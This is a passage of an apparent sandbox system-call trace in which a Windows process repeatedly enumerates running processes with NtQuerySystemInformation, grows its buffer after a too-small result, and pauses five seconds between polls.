ResultLength=0x0) returned 0xc0000004 [0148.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.902] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.919] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.929] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.937] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.950] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.959] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.968] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.062] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.226] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.272] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.288] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.304] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.326] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.344] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.356] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.366] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.384] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.395] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.419] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.424] NtAllocateVirtualMemory (in: 